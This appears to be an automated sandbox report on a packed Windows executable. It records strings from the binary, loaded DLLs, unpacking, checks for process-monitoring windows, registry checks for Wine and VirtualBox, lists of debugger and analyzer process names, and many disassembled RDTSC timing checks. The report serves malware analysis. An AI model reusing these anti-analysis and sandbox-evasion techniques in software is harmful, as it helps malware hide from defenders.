Source: Cc8zEnIDB2.exeString found in binary or memory: mh1a3V6fL/ADD2ns/z/wCD01/rsUPLf7iJvTyjxJH7j/P4fSopLdGELv8AP5kX72Tzf8nPYVo+X+72f+RM/jj/AD2560RxrJsjR4+Zf9XzPP8A/r+nbnpXP9ajSf72ce/xJb9767a/JeVl9YXl/X/bxg+T9xIZJN/XHH+fyqtNpqXEb74Y9/8AyyuPK8if26/59q9F0/wf4p1NkWx8LeJ7vzP9VJBo2qeQT1yD04HSvRNL/Z0+K2qIjf8ACLR2KSfuvM
Source: Cc8zEnIDB2.exeString found in binary or memory: OUQ/i/or+0D/hXvgD/oRvB//hM6L/8AIVH/AAr3wB/0I3g//wAJnRf/AJCo/wCJ6P8Aq1v/AJu3/wCKIf8AFKr/AKvx/wCcv/8AyiH8X9Ff2gf8K98Af9CN4P8A/CZ0X/5Co/4V74A/6Ebwf/4TOi//ACFR/wAT0f8AVrf/ADdv/wAUQ/4pVf8AV+P/ADl//wCUQ/i/or+0D/hXvgD/AKEbwf8A+Ezov/yFR/wr3wB/0I3g/wD8JnRf/kKj/iej/q1v/
Source: Cc8zEnIDB2.exeString found in binary or memory: /+vXl3/C1PB//AD86n/4LD/8AJtQt8VPCH/PzrH/grz+hvqawmIf/ADDP/wABn5eXn+DLp+y8vw/G3Xa1tfxPV/P9v0/+vUfme36//Wryv/hanhH/AJ+NY/8ABd/92Uf8LZ8Ifc+06v8A+ARx/wClvXHv074rb6niX/y4/wDJJdbeXn/Wl9Lf1f8Arv8A1Znp/mfP756+/TH9P85pFbNeU/8AC2/B6t/rtYfH/UPHT3/073/rij/hbvg//nrrn/gsX/5
Source: Cc8zEnIDB2.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: Cc8zEnIDB2.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSection loaded: kernel.appcore.dllJump to behavior
Source: Cc8zEnIDB2.exeStatic file information: File size 4430848 > 1048576
Source: Cc8zEnIDB2.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x283e00
Source: Cc8zEnIDB2.exeStatic PE information: Raw size of sgmjipkl is bigger than: 0x100000 < 0x1b2200

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeUnpacked PE file: 0.2.Cc8zEnIDB2.exe.4d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;sgmjipkl:EW;pwaltzxf:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;sgmjipkl:EW;pwaltzxf:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: Cc8zEnIDB2.exeStatic PE information: real checksum: 0x43ec7b should be: 0x4420b3
Source: Cc8zEnIDB2.exeStatic PE information: section name:
Source: Cc8zEnIDB2.exeStatic PE information: section name: .idata
Source: Cc8zEnIDB2.exeStatic PE information: section name:
Source: Cc8zEnIDB2.exeStatic PE information: section name: sgmjipkl
Source: Cc8zEnIDB2.exeStatic PE information: section name: pwaltzxf
Source: Cc8zEnIDB2.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_008541D0 push eax; mov dword ptr [esp], edx0_2_008541D5
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_00552340 push eax; mov dword ptr [esp], 00000000h0_2_00552343
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_0058C7F0 push eax; mov dword ptr [esp], 00000000h0_2_0058C743
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_0053EAD1 push 0099C3C1h; ret 0_2_0053EAF2
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_00510AC0 push eax; mov dword ptr [esp], 00000000h0_2_00510AC4
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_00531430 push eax; mov dword ptr [esp], 00000000h0_2_00531433
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_005539A0 push eax; mov dword ptr [esp], 00000000h0_2_005539A3
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_0052DAD0 push eax; mov dword ptr [esp], edx0_2_0052DAD1
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_00859F40 push dword ptr [eax+04h]; ret 0_2_00859F6F
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_07130736 push cs; iretd 0_2_07130744
Source: Cc8zEnIDB2.exeStatic PE information: section name: sgmjipkl entropy: 7.954959217473626

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: Cc8zEnIDB2.exe, 00000000.00000003.1302588655.000000000730F000.00000004.00001000.00020000.00000000.sdmp, Cc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: PROCMON.EXE
Source: Cc8zEnIDB2.exe, 00000000.00000003.1302588655.000000000730F000.00000004.00001000.00020000.00000000.sdmp, Cc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: X64DBG.EXE
Source: Cc8zEnIDB2.exe, 00000000.00000003.1302588655.000000000730F000.00000004.00001000.00020000.00000000.sdmp, Cc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WINDBG.EXE
Source: Cc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: Cc8zEnIDB2.exe, 00000000.00000003.1302588655.000000000730F000.00000004.00001000.00020000.00000000.sdmp, Cc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C622F2 second address: C622F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C57DB3 second address: C57DB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C6158A second address: C61590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C61590 second address: C615A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F43E91C545Ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C6184D second address: C61883 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F43E8C1FDD6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f jnp 00007F43E8C1FDD6h 0x00000015 jmp 00007F43E8C1FDE0h 0x0000001a pop ebx 0x0000001b pushad 0x0000001c jmp 00007F43E8C1FDDBh 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C61883 second address: C61888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C619DE second address: C619EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43E8C1FDDCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C619EE second address: C61A11 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F43E91C5456h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F43E91C5460h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C61B36 second address: C61B47 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 je 00007F43E8C1FDD6h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop esi 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C61B47 second address: C61B67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push edi 0x00000009 push edx 0x0000000a pop edx 0x0000000b jno 00007F43E91C5456h 0x00000011 pop edi 0x00000012 pushad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 je 00007F43E91C5456h 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C61B67 second address: C61B83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDE5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C64388 second address: C6438C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C6438C second address: C64423 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F43E8C1FDDBh 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e jmp 00007F43E8C1FDE3h 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push ebx 0x00000018 push eax 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b pop eax 0x0000001c pop ebx 0x0000001d pop eax 0x0000001e mov esi, dword ptr [ebp+122D2A9Bh] 0x00000024 clc 0x00000025 lea ebx, dword ptr [ebp+1244A186h] 0x0000002b push 00000000h 0x0000002d push edi 0x0000002e call 00007F43E8C1FDD8h 0x00000033 pop edi 0x00000034 mov dword ptr [esp+04h], edi 0x00000038 add dword ptr [esp+04h], 0000001Ah 0x00000040 inc edi 0x00000041 push edi 0x00000042 ret 0x00000043 pop edi 0x00000044 ret 0x00000045 mov dword ptr [ebp+122D315Bh], ecx 0x0000004b add cx, ADD3h 0x00000050 xchg eax, ebx 0x00000051 ja 00007F43E8C1FDE4h 0x00000057 push eax 0x00000058 push ebx 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007F43E8C1FDE2h 0x00000060 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C644AD second address: C644B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C644B2 second address: C644E2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jns 00007F43E8C1FDD6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f jmp 00007F43E8C1FDE5h 0x00000014 push 00000000h 0x00000016 push FE63B0A5h 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C644E2 second address: C6456E instructions: 0x00000000 rdtsc 0x00000002 je 00007F43E91C5456h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b jc 00007F43E91C5456h 0x00000011 pop ecx 0x00000012 popad 0x00000013 add dword ptr [esp], 019C4FDBh 0x0000001a pushad 0x0000001b sub dword ptr [ebp+122D185Eh], ecx 0x00000021 mov si, bx 0x00000024 popad 0x00000025 push 00000003h 0x00000027 push 00000000h 0x00000029 mov dword ptr [ebp+122D3098h], eax 0x0000002f push 00000003h 0x00000031 mov cl, 66h 0x00000033 push 917C1B2Fh 0x00000038 jmp 00007F43E91C5460h 0x0000003d add dword ptr [esp], 2E83E4D1h 0x00000044 push edi 0x00000045 pop edx 0x00000046 pushad 0x00000047 movsx edx, cx 0x0000004a mov cx, si 0x0000004d popad 0x0000004e lea ebx, dword ptr [ebp+1244A18Fh] 0x00000054 push 00000000h 0x00000056 push edi 0x00000057 call 00007F43E91C5458h 0x0000005c pop edi 0x0000005d mov dword ptr [esp+04h], edi 0x00000061 add dword ptr [esp+04h], 0000001Ah 0x00000069 inc edi 0x0000006a push edi 0x0000006b ret 0x0000006c pop edi 0x0000006d ret 0x0000006e cld 0x0000006f push eax 0x00000070 js 00007F43E91C5460h 0x00000076 pushad 0x00000077 push eax 0x00000078 push edx 0x00000079 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C645D4 second address: C645D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C645D8 second address: C64644 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 movsx edi, dx 0x0000000c push 00000000h 0x0000000e mov edx, dword ptr [ebp+122D2BDBh] 0x00000014 call 00007F43E91C5459h 0x00000019 pushad 0x0000001a jnl 00007F43E91C5458h 0x00000020 push ebx 0x00000021 jmp 00007F43E91C5461h 0x00000026 pop ebx 0x00000027 popad 0x00000028 push eax 0x00000029 jmp 00007F43E91C5461h 0x0000002e mov eax, dword ptr [esp+04h] 0x00000032 jl 00007F43E91C5460h 0x00000038 pushad 0x00000039 pushad 0x0000003a popad 0x0000003b jnc 00007F43E91C5456h 0x00000041 popad 0x00000042 mov eax, dword ptr [eax] 0x00000044 push eax 0x00000045 push edx 0x00000046 push edi 0x00000047 jnc 00007F43E91C5456h 0x0000004d pop edi 0x0000004e rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C64644 second address: C64649 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C64649 second address: C6466C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F43E91C5464h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C6466C second address: C64676 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F43E8C1FDD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C7695D second address: C7697C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F43E91C5467h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C844C4 second address: C844C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C844C8 second address: C844CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C844CC second address: C844EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F43E8C1FDEEh 0x0000000c jmp 00007F43E8C1FDE2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C844EC second address: C844F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C84664 second address: C84668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C84796 second address: C8479A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C8479A second address: C8479E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C8479E second address: C847A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C847A4 second address: C847C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43E8C1FDE9h 0x00000009 jng 00007F43E8C1FDD6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C847C7 second address: C847CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C848FE second address: C84914 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F43E8C1FDDCh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C84914 second address: C8491E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F43E91C5456h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C8491E second address: C84922 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C84922 second address: C84928 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C84928 second address: C84942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F43E8C1FDE1h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C84942 second address: C84948 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C84C50 second address: C84C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F43E8C1FDE1h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C84C68 second address: C84C6D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C84C6D second address: C84C86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43E8C1FDDAh 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jnc 00007F43E8C1FDD6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C84EEA second address: C84EF5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C84EF5 second address: C84F03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ecx 0x00000007 pop esi 0x00000008 pushad 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C84F03 second address: C84F09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C85056 second address: C8505C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C8505C second address: C85072 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F43E91C5460h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C85072 second address: C85097 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F43E8C1FDE2h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop edx 0x0000000f jnp 00007F43E8C1FDDEh 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C851BE second address: C851CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ebx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C851CC second address: C851D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C85339 second address: C8533D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C854C4 second address: C854C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C854C8 second address: C854CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
